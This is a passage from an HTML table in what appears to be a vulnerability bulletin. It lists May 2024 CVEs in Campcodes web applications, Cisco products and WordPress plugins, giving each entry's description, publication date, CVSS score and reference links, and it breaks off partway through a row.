<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4681" target="_blank">CVE-2024-4681</a><br><a href="https://github.com/yylmm/CVE/blob/main/Legal%20Case%20Management%20System/file_upload.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263622" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263622" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.331468" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability classified as critical has been found in Campcodes Online Examination System 1.0. This affects an unknown part of the file addExamExe.php. The manipulation of the argument examTitle leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264447.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4912&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4912" target="_blank">CVE-2024-4912</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_addExamExe.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264447" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264447" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333402" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability classified as critical was found in Campcodes Online Examination System 1.0. This vulnerability affects unknown code of the file exam.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264448.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4913&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4913" target="_blank">CVE-2024-4913</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_exam.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264448" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264448" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333403" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability, which was classified as critical, has been found in Campcodes Online Examination System 1.0. This issue affects some unknown processing of the file ranking-exam.php. The manipulation of the argument exam_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264449 was assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4914&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4914" target="_blank">CVE-2024-4914</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_ranking-exam.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264449" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264449" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333407" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability, which was classified as critical, was found in Campcodes Online Examination System 1.0. Affected is an unknown function of the file result.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264450 is the identifier assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4915&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4915" target="_blank">CVE-2024-4915</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_result.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264450" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264450" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333408" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability has been found in Campcodes Online Examination System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file selExamAttemptExe.php. The manipulation of the argument thisId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264451.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4916&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4916" target="_blank">CVE-2024-4916</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_selExamAttemptExe.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264451" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264451" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333409" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability was found in Campcodes Online Examination System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file submitAnswerExe.php. The manipulation of the argument exmne_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264452.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4917&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4917" target="_blank">CVE-2024-4917</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_submitAnswerExe.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264452" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264452" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333410" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability was found in Campcodes Online Examination System 1.0. It has been classified as critical. This affects an unknown part of the file updateQuestion.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264453 was assigned to this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4918&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4918" target="_blank">CVE-2024-4918</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_updateQuestion.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264453" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264453" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333415" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Examination System<br> </td>
<td>A vulnerability was found in Campcodes Online Examination System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /adminpanel/admin/query/addCourseExe.php. The manipulation of the argument course_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264454 is the identifier assigned to this vulnerability.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4919&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4919" target="_blank">CVE-2024-4919</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Examination%20System%20With%20Timer/SQL_addCourseExe.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.264454" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.264454" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333416" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability, which was classified as critical, has been found in Campcodes Online Laundry Management System 1.0. This issue affects some unknown processing of the file /admin_class.php. The manipulation of the argument id/delete_category/delete_inv/delete_laundry/delete_supply/delete_user/login/save_inv/save_user leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263891.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4792&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4792" target="_blank">CVE-2024-4792</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/sql_action.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263891" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263891" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332533" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability, which was classified as critical, was found in Campcodes Online Laundry Management System 1.0. Affected is an unknown function of the file /manage_laundry.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263892.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4793&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4793" target="_blank">CVE-2024-4793</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/sql_manage_laundry.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263892" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263892" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332535" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability has been found in Campcodes Online Laundry Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /manage_receiving.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263893 was assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4794&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4794" target="_blank">CVE-2024-4794</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/sql_manage_receiving.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263893" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263893" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332536" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability was found in Campcodes Online Laundry Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-263894 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4795&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4795" target="_blank">CVE-2024-4795</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/sql_manage_user.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263894" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263894" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332537" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability was found in Campcodes Online Laundry Management System 1.0. It has been classified as critical. This affects an unknown part of the file /manage_inv.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263895.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4796&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4796" target="_blank">CVE-2024-4796</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/sql_manage_inv.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263895" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263895" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.332538" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability has been found in Campcodes Online Laundry Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file manage_user.php of the component HTTP Request Parameter Handler. The manipulation of the argument id leads to improper control of resource identifiers. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263938 is the identifier assigned to this vulnerability.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4817&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4817" target="_blank">CVE-2024-4817</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/IDOR_manage_user.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263938" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263938" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333055" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability was found in Campcodes Online Laundry Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263939.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4818&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4818" target="_blank">CVE-2024-4818</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/LFI.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263939" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263939" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333057" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Campcodes--Online Laundry Management System<br> </td>
<td>A vulnerability was found in Campcodes Online Laundry Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file admin_class.php. The manipulation of the argument type with the input 1 leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263940.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4819&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4819" target="_blank">CVE-2024-4819</a><br><a href="https://github.com/yylmm/CVE/blob/main/Online%20Laundry%20Management%20System/IDOR.md" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?ctiid.263940" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?id.263940" target="_blank">cna@vuldb.com</a><br><a href="https://vuldb.com/?submit.333058" target="_blank">cna@vuldb.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco AppDynamics<br> </td>
<td>A vulnerability in Cisco AppDynamics Network Visibility Agent could allow an unauthenticated, local attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to the inability to handle unexpected input. An attacker who has local device access could exploit this vulnerability by sending an HTTP request to the targeted service. A successful exploit could allow the attacker to cause a DoS condition by stopping the Network Agent Service on the local device.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20394&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">5.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20394" target="_blank">CVE-2024-20394</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-appd-netvisdos-9zNbsJtK" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Network Services Orchestrator<br> </td>
<td>A vulnerability in the web-based management interface of Cisco Crosswork Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. This vulnerability is due to improper input validation of a parameter in an HTTP request. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious website.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20369&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20369" target="_blank">CVE-2024-20369</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nso-ordir-MNM8YqzO" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Secure Client<br> </td>
<td>A vulnerability in the Network Access Manager (NAM) module of Cisco Secure Client could allow an unauthenticated attacker with physical access to an affected device to elevate privileges to SYSTEM. This vulnerability is due to a lack of authentication on a specific function. A successful exploit could allow the attacker to execute arbitrary code with SYSTEM privileges on an affected device.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20391&amp;vector=CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">6.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20391" target="_blank">CVE-2024-20391</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-nam-priv-esc-szu2vYpZ" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Secure Email and Web Manager<br> </td>
<td>A vulnerability in the Cisco Crosswork NSO CLI and the ConfD CLI could allow an authenticated, low-privileged, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to an incorrect privilege assignment when specific CLI commands are used. An attacker could exploit this vulnerability by executing an affected CLI command. A successful exploit could allow the attacker to elevate privileges to root on the underlying operating system.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20383&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20383" target="_blank">CVE-2024-20383</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-sma-wsa-xss-bgG5WHOD" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Secure Email<br> </td>
<td>A vulnerability in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email and Web Manager and Secure Email Gateway could allow an unauthenticated, remote attacker to conduct an XSS attack against a user of the interface. This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20258&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20258" target="_blank">CVE-2024-20258</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-sma-wsa-xss-bgG5WHOD" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Secure Email<br> </td>
<td>A vulnerability in the web-based management API of Cisco AsyncOS Software for Cisco Secure Email Gateway could allow an unauthenticated, remote attacker to conduct an HTTP response splitting attack. This vulnerability is due to insufficient input validation of some parameters that are passed to the web-based management API of the affected system. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to perform cross-site scripting (XSS) attacks, resulting in the execution of arbitrary script code in the browser of the targeted user, or could allow the attacker to access sensitive, browser-based information.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20392&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20392" target="_blank">CVE-2024-20392</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-http-split-GLrnnOwS" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Secure Email<br> </td>
<td>A vulnerability in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email Gateway could allow an authenticated, remote attacker to conduct an XSS attack against a user of the interface.r This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20257&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20257" target="_blank">CVE-2024-20257</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-sma-wsa-xss-bgG5WHOD" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>Cisco--Cisco Secure Web Appliance<br> </td>
<td>A vulnerability in the web-based management interface of Cisco AsyncOS Software for Cisco Secure Email and Web Manager and Secure Web Appliance could allow an authenticated, remote attacker to conduct an XSS attack against a user of the interface. This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-20256&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">4.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-20256" target="_blank">CVE-2024-20256</a><br><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-sma-wsa-xss-bgG5WHOD" target="_blank">ykramarz@cisco.com</a></td>
</tr>
<tr>
<td>CodeBard--Fast Custom Social Share by CodeBard<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in CodeBard Fast Custom Social Share by CodeBard.This issue affects Fast Custom Social Share by CodeBard: from n/a through 1.1.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34807&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34807" target="_blank">CVE-2024-34807</a><br><a href="https://patchstack.com/database/vulnerability/fast-custom-social-share-by-codebard/wordpress-fast-custom-social-share-by-codebard-plugin-1-1-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>CodePeople--Appointment Hour Booking<br> </td>
<td>Improper Restriction of Excessive Authentication Attempts vulnerability in CodePeople Appointment Hour Booking allows Removing Important Client Functionality.This issue affects Appointment Hour Booking: from n/a through 1.4.56.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32720&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32720" target="_blank">CVE-2024-32720</a><br><a href="https://patchstack.com/database/vulnerability/appointment-hour-booking/wordpress-appointment-hour-booking-plugin-1-4-56-captcha-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>CodePeople--CP Polls<br> </td>
<td>: Improper Control of Interaction Frequency vulnerability in CodePeople CP Polls allows Flooding.This issue affects CP Polls: from n/a through 1.0.71.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-24873&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24873" target="_blank">CVE-2024-24873</a><br><a href="https://patchstack.com/database/vulnerability/cp-polls/wordpress-polls-cp-plugin-1-0-71-polls-limitation-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>CodePeople--CP Polls<br> </td>
<td>Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in CodePeople CP Polls allows Code Injection.This issue affects CP Polls: from n/a through 1.0.71.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-24874&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-24874" target="_blank">CVE-2024-24874</a><br><a href="https://patchstack.com/database/vulnerability/cp-polls/wordpress-polls-cp-plugin-1-0-71-content-injection-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Codezips--E-Commerce Site<br> </td>
